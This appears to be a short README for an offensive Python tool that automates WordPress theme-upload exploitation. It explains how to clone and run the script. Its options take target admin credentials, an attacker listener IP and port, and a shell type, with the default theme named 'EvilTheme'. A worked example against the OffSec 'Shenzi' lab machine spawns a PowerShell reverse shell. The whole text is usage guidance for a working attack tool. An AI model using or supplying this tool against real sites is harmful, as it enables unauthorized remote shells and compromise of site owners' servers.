This script is designed to make WordPress exploitation faster and more efficient by loading themes without having to do it manually, which saves you a lot of time since most of the time WordPress is very slow or even gives you errors.
git clone https://github.com/DLL00P/Wordpress-Theme-Upload-Exploit
cd Wordpress-Theme-Upload-Exploit
python3 exploit.py -u "URL" -U "USER" -P "PASSWORD" -lh "YOUR_IP" -lp "YOUR_PORT" -s "SHELL_TYPE"-u, --url Target URL (e.g., http://127.0.0.1/)
-U, --username WordPress username
-P, --password WordPress password
-lh, --lhost Attacker's local IP (listener host)
-lp, --lport Attacker's local port (listener port)
-s, --shell Shell type (bash, sh, powershell, cmd). Default: powershell
-t, --theme Theme name. Default: EvilTheme
python3 exploit.py -u http://192.168.110.55/shenzi/wp-admin/ -U admin -P FeltHeadwallWight357 -lh 192.168.45.199 -lp 1234 -s powershell Example done on the Shenzi machine from OffSec and as it is a Windows machine we put powershell
